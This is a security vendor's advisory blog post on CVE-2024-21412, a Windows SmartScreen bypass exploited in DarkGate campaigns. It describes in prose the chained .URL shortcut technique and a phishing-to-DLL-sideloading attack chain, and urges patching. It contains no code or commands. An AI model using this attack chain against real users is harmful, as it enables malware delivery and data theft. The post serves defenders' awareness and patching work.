SOCRadar® Cyber Intelligence Inc. | Windows SmartScreen Vulnerability Exploited in DarkGate Malware Attacks, Patch CVE-2024-21412 Now


Mar 14, 2024
4 Mins Read

Windows SmartScreen Vulnerability Exploited in DarkGate Malware Attacks, Patch CVE-2024-21412 Now

In January 2024, a new DarkGate malware campaign was discovered, which used a Windows Defender SmartScreen zero-day vulnerability to evade security measures and deploy fake installers.

The vulnerability in question is CVE-2024-21412, which recently received a patch during Microsoft’s February 2024 Patch Tuesday.

How Do Attackers Exploit the Windows Defender SmartScreen Vulnerability, CVE-2024-21412?

SmartScreen is an important Windows Defender security feature that warns users when they try to run suspicious, potentially malicious, downloaded files.

The CVE-2024-21412 (CVSS 8.1) vulnerability is classified as a Security Feature Bypass. It enables attackers to bypass Windows Defender SmartScreen’s security warnings with specially crafted files, allowing them to covertly infiltrate their victims and carry out further malicious acts.

Vulnerability card of CVE-2024-21412 (SOCRadar Vulnerability Intelligence)

Vulnerability card of CVE-2024-21412 (SOCRadar Vulnerability Intelligence)

Attackers can take advantage of this vulnerability by creating a Windows internet shortcut (.URL) file that links to another shortcut file hosted on a remote SMB share. This action results in the automatic execution of the file located at the final destination.

Notably, CVE-2024-21412 is a patch bypass for another SmartScreen vulnerability, CVE-2023-36025 (CVSS: 8.8), which was initially patched by Microsoft during November 2023 Patch Tuesday.

Threat Actors Targeting CVE-2024-21412 and Details of DarkGate Malware

After Microsoft addressed CVE-2024-21412 in February 2024 Patch Tuesday, researchers revealed that Water Hydra (a.k.a. DarkCasino) had previously exploited it as a zero-day in attacks directed at foreign exchange traders. The exploitation of the vulnerability resulted in the deployment of the DarkMe Remote Access Trojan (RAT) on victims’ systems.

Now, DarkGate malware operators are also leveraging CVE-2024-21412 with the objective of infiltrating their targets while simultaneously disabling security warnings.

The DarkGate malware appeared in July 2023 as a successor to QakBot, shortly after PikaBot, and both were used in campaigns following QakBot’s takedown. You can find a timeline of these events, including the emergence of DarkGate, in a previous SOCRadar blog post detailing the events and operations of QakBot.

For further information on DarkGate visit our blog post: DarkGate Malware, Exploring Threats and Countermeasures

Explore the details and latest updates on the operation through our Cyber Threat Intelligence module’s Threat Actor/Malware page:

DarkGate Malware, SOCRadar Threat Actors/Malware page

DarkGate Malware, SOCRadar Threat Actors/Malware page

The Attack Chain of DarkGate Malware

Operators initiate the attack by sending a phishing email containing a PDF attachment with links that leverage open redirects from Google DDM services, enabling them to bypass email security checks.

If attackers are successful in persuading the victim to click the link, the victims are directed to a compromised web server hosting an internet shortcut file (.URL). This file then links to a second shortcut file hosted on an attacker-controlled WebDAV server.

DarkGate Attack Chain (TrendMicro)

DarkGate Attack Chain (TrendMicro)

Exploiting the CVE-2024-21412 vulnerability, a Windows shortcut triggers the execution of a malicious MSI file, often disguised as legitimate software like NVIDIAApple iTunes, or Notion. Upon installation, a DLL sideloading flaw decrypts and launches the DarkGate malware, enabling data theft, additional payload deployment, keylogging, and real-time remote access for attackers.

Additionally, researchers have identified that this campaign utilizes DarkGate 6.1.7, which incorporates XOR-encrypted configuration, updated Command and Control (C2) values, and new configuration options to enhance attacks, enabling attackers to establish persistence and evade test environments more effectively.

Harness SOCRadar’s Capabilities to Stay Proactive Against Exploitation

Stay proactive in mitigating the risk of malware attacks and vulnerability exploitation. Monitor your digital assets and stay informed about the evolving vulnerability landscape to stay one step ahead of emerging threats.

SOCRadar’s Vulnerability Intelligence offers comprehensive details on identified vulnerabilities, including the latest updates, available exploits, and vulnerability lifecycles. Moreover, the Attack Surface Management module sends timely alerts for any security issues, including the emergence of vulnerabilities across your assets, facilitating a better patch management strategy.

CVE and exploit trends, SOCRadar’s Vulnerability Intelligence

CVE and exploit trends, SOCRadar’s Vulnerability Intelligence

Indicators of Compromise (IoCs) for the DarkGate Campaign Targeting SmartScreen

An extensive list of Indicators of Compromise (IoCs) related to the DarkGate campaign exploiting the Windows Defender SmartScreen vulnerability, CVE-2024-21412, is available here.